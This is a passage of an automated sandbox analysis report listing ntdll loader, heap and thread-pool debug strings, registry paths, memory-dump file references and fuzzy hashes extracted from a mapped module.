                                                                                                                                                                                Strings
                                                                                                                                                                                • .Local, xrefs: 333627F8
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 333A1FE8
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 333A20C0
                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 333A1FE3, 333A20BB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}13
                                                                                                                                                                                • API String ID: 0-3518996114
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LU03$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                • API String ID: 0-4149140204
                                                                                                                                                                                Strings
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33390E72
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33390EB5
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33390DEC
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33390E2F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                • API String ID: 2994545307-1391187441
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e63
                                                                                                                                                                                • API String ID: 0-3560663243
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                                                                • API String ID: 0-1880532218
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 333314B6
                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33331648
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 33331632
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                • API String ID: 0-2391371766
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3340B3AA
                                                                                                                                                                                • GlobalizationUserSettings, xrefs: 3340B3B4
                                                                                                                                                                                • TargetNtPath, xrefs: 3340B3AF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 3338E442
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 3338E435
                                                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3338E455
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3339A3A7
                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3339A39D
                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3339A396
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 333DD79F
                                                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 333DD7B2
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 333DD792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3333A229
                                                                                                                                                                                • @S03, xrefs: 3333A268
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3333A21B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @S03$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-1386918536
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 333BB2B2
                                                                                                                                                                                • GlobalFlag, xrefs: 333BB30F
                                                                                                                                                                                • @, xrefs: 333BB2F0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializeTls, xrefs: 333A1851
                                                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 333A185B
                                                                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 333A184A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                • API String ID: 0-931879808
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 333B85DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$AddD
                                                                                                                                                                                • API String ID: 0-2525844869
                                                                                                                                                                                • Opcode ID: cac739eb6c3ea26cf8debf7db59a772cf4f45837e1de74910793636bd48168ec
                                                                                                                                                                                • Instruction ID: 22a888c68d935537c4e12e78fbc4c70f1852a41d23bb473ef150c2ac196edd48
                                                                                                                                                                                • Opcode Fuzzy Hash: cac739eb6c3ea26cf8debf7db59a772cf4f45837e1de74910793636bd48168ec
                                                                                                                                                                                • Instruction Fuzzy Hash: DFA168B6908340AFE714CF14C885BABB7E9FF84704F448A2EF995C7650E770E9058B62
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                • Opcode ID: 3b89ed2ceb069ec68920b04875b1bc7bec60509050e28c46ccc5ac4a4bd700eb
                                                                                                                                                                                • Instruction ID: a22274a03c7bdb1a49467b27d4fba03bba64f5c32cfacad4f7c5965184bfe527
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89ed2ceb069ec68920b04875b1bc7bec60509050e28c46ccc5ac4a4bd700eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 37616BB5E423089FDB14CFACD880AADB7F9FF44340F54806AE559EB661EA30D940CB60
                                                                                                                                                                                Strings
                                                                                                                                                                                • RedirectedKey, xrefs: 3340B60E
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3340B5C4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                                                                • Opcode ID: a61e5272c5b8640500d5c3a5333d030b6346e2d95edb04d45f5b0fa5d26f07a0
                                                                                                                                                                                • Instruction ID: 90d2c4d3d1747bd5a4bf5fbdb831a456994d423e06788075b3d3780bc2b2970e
                                                                                                                                                                                • Opcode Fuzzy Hash: a61e5272c5b8640500d5c3a5333d030b6346e2d95edb04d45f5b0fa5d26f07a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 6161D4B5D01219EFDB11DFA4C888ADEBBB8FB48714F54806AE805E7240D7749A45CFA4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$$
                                                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                                                • Opcode ID: 198a177815d7a2b423ecba891f51705577a538c42866ec9ac790c6a87440e0ae
                                                                                                                                                                                • Instruction ID: 44279f20e79a6eb80eb8f43b951b0f74f81bd636a72b57551ada44903c09212e
                                                                                                                                                                                • Opcode Fuzzy Hash: 198a177815d7a2b423ecba891f51705577a538c42866ec9ac790c6a87440e0ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C61CF75E41749CFEB20CFA4CA80BADBBF1BF44714F18C169E515ABA51CB78A940CB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                • Opcode ID: 916c263a1f7793d76647d8fa9eece5feca4ad7456cb6e1c7408a0f3c81f60628
                                                                                                                                                                                • Instruction ID: 26b7d120e479344abd011e8d7ebe1f7494dc2be97cf675ebb06930d9e91910d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 916c263a1f7793d76647d8fa9eece5feca4ad7456cb6e1c7408a0f3c81f60628
                                                                                                                                                                                • Instruction Fuzzy Hash: A831DE756487808BD301DF68D880B1AB7E8EF84720F048869E855CB380EB39DD05CB53
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 23$ 23
                                                                                                                                                                                • API String ID: 0-1981344183
                                                                                                                                                                                • Opcode ID: 073821aeab32d0ab68428ddc28591cb1374296d4e61ef6f1d0e9a9ff0288957e
                                                                                                                                                                                • Instruction ID: 52583ccaefc01a3de44b3fd2e83c335d8d9ae2ef0cbf587d28387ba0be47be4d
                                                                                                                                                                                • Opcode Fuzzy Hash: 073821aeab32d0ab68428ddc28591cb1374296d4e61ef6f1d0e9a9ff0288957e
                                                                                                                                                                                • Instruction Fuzzy Hash: AD31A236A067059BD711DE14C880EDB7BE9AFC56B0F05C529FC96E7220EA38DC158BA1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
